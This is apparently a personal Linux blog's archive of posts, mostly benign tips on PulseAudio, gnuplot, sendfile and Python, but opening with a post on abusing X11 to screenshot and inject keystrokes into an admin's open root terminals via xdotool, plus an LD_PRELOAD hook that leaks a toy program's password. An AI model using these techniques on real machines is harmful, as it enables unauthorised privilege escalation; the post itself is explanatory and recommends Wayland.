Friday, 20 April 2018

Privilege escalation and pivoting with the X Window System

What is X?

"X provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard. X does not mandate the user interface – this is handled by individual programs. As such, the visual styling of X-based environments varies greatly; different programs may present radically different interfaces."
https://en.wikipedia.org/wiki/X_Window_System

X helps to give you a GUI and is very common. It is being phased out by Wayland; however, is still very popular.

How you can [ab]use X.

Suppose you have access to an Admin's workstation, and if they are anything like myself, they have a lot of windows open. When logged in as the user, you basically have control over their X session. This means that you can view what windows are open and even send keystrokes to them.

To view the windows and some rudimentary information about them, you can use:

$ xwininfo -tree -root -all

Looking through this, you can see easily see interesting windows. Searching for 'root@', for me, revealed that I had two root terminals open:

$ xwininfo  -root -tree | grep "root@"
        0x26008f2 "root@parrot:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64
       
0x2601f64 "root@llama:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64

Out of curiosity, we can even see what is on those windows by taking a dump of the window and viewing the dump in xwud or by converting it to a jpg:

$ xwd -id 0x2601f64 -out llama.xwd
$ convert llama.xwd llama.jpg

llama.jpg

In order to take a screenshot, the window must be fully displayed or you are at risk of things being chopped off. Activating the window allows for a reliable screenshot, and you can even put the original window back when you are done:

$ PREV=`xdotool getactivewindow`; xdotool windowactivate  0x2601f64; xwd -id 0x2601f64 -out llama.xwd; xdotool windowactivate $PREV

Now for the fun part; let's send keyboard events to the window. To control the mouse and keyboard we can use a tool called 'xdotool'. I have found best results when sending single keystrokes along with a short delay. In addition, some characters have to be mapped to phrase. I made a small helper, xdotoolhelper, to handle this:

#!/bin/bash

WINDOW=$1
MSG=$2

xdotool  windowactivate $WINDOW;
while read -n1 i; do
    case $i in
        "")    i="space"     ;;
        "\"")  i="quotedbl"  ;;
        "@")   i="at"        ;;
        "-")   i="minus"     ;;
        ";")   i="semicolon" ;;
    esac
    xdotool key $i
    sleep 0.01
done <<<"$MSG"
xdotool key Return

Now, we can simply send keyboard input to other windows:

$ ./xdotoolhelper.sh 0x2601f64 "yum -y install sl; sl"

Tadaa. Now we can control applications even if they originally required a 100 character passphrase, fingerprint recognition and a stool sample in order to authenticate.

Am I using X?

To determine if the user is using X, you can run the following:

$ loginctl
   SESSION    UID   USER   SEAT    TTY            
        c1    42    gdm    seat0   /dev/tty1      
        44    1000  adam   seat0   /dev/tty2      

2 sessions listed.


$ loginctl show-session 44 -p Type
Type=x11 
<-- That is X


It's a feature, not a bug.

Windowing systems have a bit of a bad history off bridging supposedly sandboxed things, not due to bugs but its inherent design. Wayland is replacing X and has a much stronger security focus. Move to Wayland!

Monday, 19 January 2015

Automatically installing gem dependencies when setting up Metasploit

Quick post! Setting up metasploit from source was being a bitch. I don't often work with ruby, which was more than likely why I was having issues. bundle install was not working as I would have liked and metasploit wanted 101 dependencies installing.. one.. by.. one.

ANYHO, here is a one line script I made to automate the whole process of installing the dependencies:

while true; do package=`./msfconsole 2>&1 | grep -Eo "Could not find.*" | awk {'print $4'}`; if [ -z $package ]; then echo done; break; else nam=`echo $package | grep -oE "^.*-" | sed s/-$//g`; ver=`echo $package | grep -Eo "[0-9][0-9\.]+$"`; echo $nam $ver; gem install $nam -v $ver ;fi; done  

I am sure there is a lovely neat way of doing this, however unfortunately, I did not know how.

Tuesday, 5 August 2014

sendfile system call > cat and cp

My friend just came to me and asked me whether I thought it would be quicker to use cat to copy a file or to create a bespoke program to do the same job. Whilst I originally thought the differences would be negligible I remembered the system call 'sendfile' and thought I would have a poke. 

In the linux 2.2 kernel (This release was not yesterday, it was in 1999), the system call 'sendfile' was released allowing for fast file transfers between two file descriptors.

man sendfile:
"Because this copying is done within the kernel, sendfile() is more efficient than the combination of read(2) and write(2), which would require transferring data to and from user space"

With a quick review of the coreutils source code, I don't think that sendfile is in use..

[adam@localhost coreutils-8.23]$ grep sendfile * -RA2
TODO:Integrate use of sendfile, suggested here:
TODO-  http://mail.gnu.org/archive/html/bug-fileutils/2003-03/msg00030.html
TODO-I don't plan to do that, since a few tests demonstrate no significant benefit.



So for the hell of it I made a crude cp using sendfile to compare with:
 #include <sys/sendfile.h>  
 #include <sys/types.h>  
 #include <sys/stat.h>  
 #include <fcntl.h>  
 #include <stdio.h>  
   
 //ssize_t sendfile(int out_fd, int in_fd, off_t *offset, size_t count);  
   
 int main(int argc, char **argv){  
     ssize_t sf_stat;  
   
     if (argc != 3){  
         printf("usage: %s in_file out_file\n", argv[0]);  
         return -1;  
     }  
   
     int in_fd = open(argv[1], O_RDONLY);  
     int out_fd = creat(argv[2], S_IRUSR|S_IWUSR);  
   
     if ((in_fd | out_fd) < 0){  
         perror("error opening file");  
         return -1;  
     }  
   
     do {  
         sf_stat = sendfile(out_fd, in_fd, NULL, 65536);  
     } while (sf_stat > 0);  
   
     if (sf_stat < 0){  
         perror("error copying file");  
     }  
   
     close(in_fd);  
     close(out_fd);  
 }  


And the results were...

...that the coreutils code should probably be updated. I mean, come on, it's been 15 years already:

[adam@localhost c]$ time ./sendfile large_file /dev/null
real 0m0.044s
user 0m0.001s
sys 0m0.042s


[adam@localhost c]$ time cat large_file > /dev/null
real 0m0.283s
user 0m0.005s
sys 0m0.274s


[adam@localhost c]$ time cp large_file /dev/null
real 0m0.251s
user 0m0.003s
sys 0m0.246s


UPDATE! I did further tests. Sending files to /dev/null acts differently when using send_file; it doesn't matter what you copy, it takes the same(ish) amount of time. For normal copies, it is slightly quicker. I am still looking into it. :)
 

Sunday, 13 July 2014

Microphone not detected in Rosetta Stone under Wine

This was a pain in my balls for many an hour. Ethically I can not not post it online.

Scenario:

 - Running Rosetta Stone under Wine.
 - Rosetta Stone does not detect your microphone.

Bodge, but it works:

 - Enter a lesson. When prompted select "Turn speech OFF for this session".
 - Within the lesson, if needed, enable the microphone by enabling "Speech recognition" in the settings.

Done!

Agreed, this is a bit of a shit fix, works though :).



Thursday, 6 March 2014

Google Translate In Terminal

I am currently trying to learn french, and just to make life a tad easier, i wrote a wrapper for google translate.

Because when do you not have a terminal handy?



(Psst. I have up a more updated version here)

Saturday, 1 March 2014

Debugging with colour in Python

It's the little things that make life worth living, debugging with colour for example:

  

#!/usr/bin/python

debug_level = 3

def debug(level, string):  
    level_char=["+", "*", "**", "***"]
    level_colour=['\033[1;96m', '\033[1;92m', '\033[1;93m', '\033[1;91m']
  
    if (level <= debug_level):
        print " %(level_colour)s[%(level_char)s]\033[0;39m\t%(string)s" % \
            {"level_colour": level_colour[level], \
            "level_char": level_char[level], \
            "string": string}  

def main():
    debug(0, "General information")
    debug(1, "Debug 1")
    debug(2, "Debug 2")
    debug(3, "Debug 3")
  
          
if __name__ == "__main__":
    main()


Thursday, 2 January 2014

NEW SWITCH


Today I finally got a chance to play with my new switch (SG300), and I spent more time configuring the banner than I did configuring the actual functionality..

Still though, you have to admit its quite fetching..

Archer <3



Sunday, 10 November 2013

Subverting library calls with LD_PRELOAD

LD_PRELOAD is a dandy environment variable which, when set, allows us to override functions in shared libraries. Consider the following program:

[adam@localhost code]$ ./secret
Usage: ./secret password
[adam@localhost code]$ ./secret abc123
ERROR: Incorrect password
[adam@localhost code]$ 


Well crap. What to do. Lets have a look at the functions called:

[adam@localhost code]$ nm -D secret
                 w __gmon_start__
                 U __libc_start_main
                 U printf
                 U puts
                 U strlen
                 U strncmp



If only we knew what parameters were being passed to strncmp!.. Oh wait this is a tutorial:

Creating our own strncmp:

[adam@localhost code]$ cat load_me_first.c
#include <stdio.h>
#include <stdlib.h>

int strncmp(const char *cs, const char *ct, size_t count){
   
    printf("[ Non-offical strncmp hit ]\n"
           "\tcs = %s\n"
           "\tct = %s\n",
            cs, ct);
                   
    exit(0);
}



Compiling the object:

[adam@localhost code]$ gcc -shared -o load_me_first.so -fPIC load_me_first.c
[adam@localhost code]$ ls -la *.so
-rwxrwxr-x. 1 adam adam 8065 Nov 10 22:58 load_me_first.so



And finally calling using LD_PRELOAD:

[adam@localhost code]$ LD_PRELOAD=./load_me_first.so ./secret "if only this was the password"
[ Non-offical strncmp hit ]
    cs = qwerty
    ct = if only this was the password
[adam@localhost code]$



Whayy. We can see that the user password is being compared against "qwerty", we would have never been able to brute that!

[adam@localhost code]$ ./secret qwerty

        )\               (__)
       /  \              (oo)
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     Cow trying out for a part
       in the new JAWS movie





(p.s. This is not the answer for Don't forget to return!)

Don't forget to return! Scripting challenge.

I found this quite an amusing scripting challenge. If you get stuck feel free to ask for a hint. If you post your answer I will post mine! (Don't go OTT! If you are above 100 lines ye gone too farr)




And i'm not talking about guessing EVERY combination here..

[adam@localhost code]$ time ./strcmp_bruter.py
made it.
Tell me and I forget, teach me and I may remember, involve me and I learn.

real    0m0.111s
user    0m0.043s
sys    0m0.050s
[adam@localhost code]$

Thursday, 24 October 2013

Creating pretty graphs in linux with gnuplot

You have to love graphs and their graphingawesomeness. I'm not going to lie, I have a thing for them ever since I met gnuplot.

I really should be hitting they hay so this will be a quick one.

As an example I have pinged google 100 times and dropped the delay into a text file

[adam@localhost gnuplot]$ ping google.com -c 100 -ni 0.2 | awk -F [=\ ] {'print $(NF-1)'} | grep -E "[0-9]" > ping.dat

[adam@localhost gnuplot]$ head -n 5 ping.dat
27.3
22.2
23.2
72.7
26.4

[adam@localhost gnuplot]$ cat ping.gp
#!/usr/bin/gnuplot
set terminal png
set output "ping.png"
set ylabel "Delay (m/s)"
set xlabel "Number"
plot "ping.dat" with lines

[adam@localhost gnuplot]$ ./ping.gp




Poof. we have a graph



Not cool enough for you?

- set terminal png
- set output "ping.png"
+ set terminal dumb




Concurrent audio outputs with PulseAudio in Fedora (playing through multiple speakers at the same time)

pacmd is the dogs bollocks. 

I wanted to be able to talk to my friend on skype with one of my headphones in, whilst playing a movie over HDMI on my tv from my laptop, and searching for this was not proving easy on google. Whilst searching how to fix another issue i fell upon pacmd. With pacmd, you can manipulate your audio inputs and outputs to a unexpectedly awesome amount.

Below are a few examples but first things first, if you get stuck, RTFM. I have added a few bits of grep and awkage just to make it easier to read, I hope you don't mind.



What sinks (devices..ish) do we have

[adam@localhost ~]$ pacmd list-sinks | grep index -A 1
    index: 0
    name: <alsa_output.pci-0000_00_03.0.hdmi-stereo-extra1>
--
  * index: 1
    name: <alsa_output.pci-0000_00_1b.0.analog-stereo>
[adam@localhost ~]$ 


I have two different sinks: my HDMI out and my standard audio card, index 0 and 1 respectively. Dropping the grep gives you a bunch more useful information which I am sure if of use to lots of you.



Redirecting audio output

If you want to just swap audio to another output its pretty simple, you can just change the default sink:

[adam@localhost ~]$ pacmd set-default-sink 0

So now if I load up another application, the audio will be outputted to sink 0, which in my case is my HDMI.

This will not however redirect the audio of current applications. To list the applications which are currently linked to a sink, run the following:

[adam@localhost ~]$ pacmd list-sink-inputs | grep -Ei "(available|sink|index|application\.name)" | sed s/^[[:space:]]*//g 

>>> 1 sink input(s) available.
index: 39
sink: 1 <alsa_output.pci-0000_00_1b.0.analog-stereo>
application.name = "ALSA plug-in [plugin-container.#prelink#.QLz5gf (deleted)]"

This was a crappy youtube video that I had paused at the time, but it makes a good example. If i want to instantly redirect the output of the application all we have to do is move the index to another sink:

[adam@localhost ~]$ pacmd move-sink-input 39 0 > /dev/null
[adam@localhost ~]$ pacmd list-sink-inputs | grep -Ei "(available|sink|index|application\.name)" | sed s/^[[:space:]]*//g
 

>>> 1 sink input(s) available.
index: 39
sink: 0 <alsa_output.pci-0000_00_03.0.hdmi-stereo-extra1>
application.name = "ALSA plug-in [plugin-container.#prelink#.QLz5gf (deleted)]"


Tadaaa, it's now playing over HDMI without affecting any other application.



Playing over multiple speakers

For this we need a module, yes you read right pacmd is modular, it's just that awesome.

[adam@localhost ~]$ pacmd load-module module-combine-sink sink_name="Combined" slaves=0,1 adjust_time=5

[adam@localhost ~]$ pacmd list-sinks | grep index -A 1
    index: 0
    name: <alsa_output.pci-0000_00_03.0.hdmi-stereo-extra1>
--
  * index: 1
    name: <alsa_output.pci-0000_00_1b.0.analog-stereo>
--
    index: 2
    name: <Combined>

[adam@localhost ~]$ pacmd set-default-sink 2



What this did was create a new sink called "Combined" joining together my HDMI card and my standard audio card together with a 5 second re-sample rate to keep things in sync. If you have issues with the speakers becoming out of time, play with the adjust_time option. By omitting the slave option, all cards will be joined.



Too quiet?

My laptop speakers aren't half bad however some web players are just SO quiet. To fix it, we can set the volume to 100%+. The following sets it to 150%

[adam@localhost ~]$ pacmd set-sink-volume 1 0x15000



Else

You can of course do other magical things, i just have not had the time to look into them further.

Hello World!


I have a blog! Hopefully someone, somewhere in the world will find a post on here that fixes that ball ache of a problem they have been googling for, for the past 2 hours.